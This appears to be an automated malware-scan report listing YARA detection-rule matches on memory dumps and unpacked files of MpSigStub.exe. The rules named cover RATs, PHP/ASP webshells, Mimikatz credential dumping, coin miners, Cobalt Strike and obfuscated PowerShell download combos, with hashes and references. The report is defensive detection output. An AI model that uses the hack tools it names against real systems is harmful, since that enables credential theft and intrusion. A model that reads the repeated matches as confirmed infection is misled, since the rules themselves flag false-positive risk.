Source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp, type: MEMORY Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, type: MEMORY Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 0000000B.00000003.18304005294.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18304005294.0000021B5F0A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18271592322.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 0000000B.00000003.18319052048.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18274401983.0000021B5F6D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 0000000B.00000003.18306005609.0000021B5FB74000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18298197645.0000021B5F85C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 0000000B.00000003.18283413145.0000021B5DF04000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
